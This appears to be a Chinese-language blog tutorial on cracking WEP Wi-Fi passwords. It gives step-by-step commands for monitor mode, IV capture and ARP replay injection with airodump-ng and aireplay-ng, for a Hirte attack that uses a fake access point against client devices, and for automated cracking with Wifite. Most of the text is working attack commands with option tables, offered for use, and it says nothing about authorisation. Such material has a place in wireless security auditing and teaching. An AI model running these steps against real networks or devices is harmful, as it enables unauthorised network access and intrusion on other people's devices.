抱歉,您的浏览器无法访问本站
本页面需要浏览器支持(启用)JavaScript
了解详情 >

参考链接:https://www.aircrack-ng.org/doku.php?id=airbase-ng

Aircrack-ng破解WEP加密

原理:

​ ARP request重放攻击,当抓取到一个ARP请求包的时候对它进行重放,WEP体系允许IV的重复使用,因此AP会对重放的ARP request进行应答,从而能够收集到足够数量的IV。
​ 在客户端开启无线,但是没有与目标AP连接的情况下,可以通过airbase-ng伪造目标AP来欺骗客户端与其连接,这时也会产生握手包,通过这个握手包,同样可以实现破解目标AP无线密码以及入侵客户端。

开启无线网卡监听模式

1
2
3
4
airmon-ng check kill    
airmon-ng start wlan0
iwconfig
airmon-ng stop wlan0mon

在终端输入命令airmon-ng check kill,杀死占用无线网卡的程序。
输入airmon-ng start wlan0开启无线网卡的监听模式。 开启监听之后,无线接口已经由wlan0变成了wlan0mon输入iwconfig可以看到,此时wlan0mon处于监听模式。
输入airmon-ng stop wlan0mon禁用监听模式,返回到管理模式。

扫描周边无线信号,找到加密算法为WEP的AP

1
airodump-ng wlan0mon

Ctrl+C 停止扫描

捕获相应AP的数据包,并保存捕获到的IVs数据

1
airodump-ng  wlan0mon --bssid 78:A3:51:15:67:C6 --ivs -w wep -c 3 
选项 说明
–ivs 表示仅保存用于破解的IVs数据报文;
-w 指定数据包保存的文件前缀;
–bssid 指定目标AP的mac地址;
-c 指定目标AP工作的信道;

其中,捕获到的IVs数据包将保存到wep-xx.ivs文件中

为了加快捕获IVs数据包的速度,打开另一终端,发起ARP request攻击

1
aireplay-ng -3 -b 78:A3:51:15:67:C6 -h 3c:15:c2:d8:d0:72 wlan0mon
选项 说明
-3 表示实施ARP request攻击;
-b 指定目标AP的MAC地址;
-h 指定连接AP的合法客户端的MAC地址。

当#Data列数值超过2万时,可以尝试进行破解。注:如果该AP正在进行大流量交互,#Data列数值增长很快,则不需进行ARP攻击。

使用aircrack-ng工具破解密码

1
aircrack-ng wep-01.ivs


Hirte攻击破解WEP

攻击思路:
Hirte是破解无线网络WEP Key的一种攻击类型 。
只要客户端设备(笔记本电脑,手机等)连接过的无线网络,那些WIFI即使是不在攻击者范围内也都能被破解,因为该wifi的WEP密钥和配置文件仍然存储在这些无线设备中。
实施这种攻击的要求是建立一个和WEP网络相同的SSID假冒接入点。当客户端设备尝试自动连接到无线网络设时,假冒接入点(攻击者机器)会对受害者设备进行ARP攻击,导致受害者设备将包含密钥流的数据包发出。

用airbase-ng工具建立WEP接入点

1
airbase-ng -c 7 -e 假冒AP -W 1 -N wlan0mon
选项 说明
-c 定义信道
-e 指定要假冒AP的名字
-W 设置加密位
-N 使用Hirte攻击模式。

airbase-ng建立了一个BSSID 为00:24:B2:4A:DE:BD的AP 。后面是客户端连接这个假冒AP之后开始Hirte攻击 。注:第二步开始捕获数据包之后,再用客户端连接假冒AP。

配置airodump-ng捕捉数据包并保存数据包文件名字为cfrag

1
airodump-ng -c 7 -N 假冒AP -w cfrag wlan0mon

使用aircrack-ng破解WEP。

每捕获5000个IVs就开始重新攻击,直至破解

1
aircrack-ng cfrag-01.cap


使用Wifite工具破解WEP

Wifite是一款自动化WEP、WPA和WPS破解工具。

破解

1
wifite --wep --keep-ivs 
选项 说明
–wep 表示仅显示WEP加密网络;
–keep-ivs 表示保留IVs文件。

Wifite将开始等待WEP replay,当WEP replay超过10000时,就会开始尝试破解。

从输出信息可以看到,成功破解了目前AP的密码。破解的密码默认保存到cracked.json中。

查看cracked.json文件。

1
cat cracked,json

从输出信息可以看到破解的AP的相关信息。例如,该AP的ESSID和BSSID,加密类型为WEP,十六进制密钥为:12:34:56:78:90

加密

同样的,可以使用wifite 破解WPA加密。

选项 说明
–wpa 表示仅扫描WPA加密的网络。
–dict 指定密码字典。
wifite –help 查看帮助文档

使用Fern WiFi Cracker工具破解WEP

Fern WiFi Cracker是一款无线安全审计和攻击软件,使用Python编程语言和Python的Qt图形界面库实现。该工具可以破解并恢复WEP、WPA、WPS加密的无线网络密码。

评论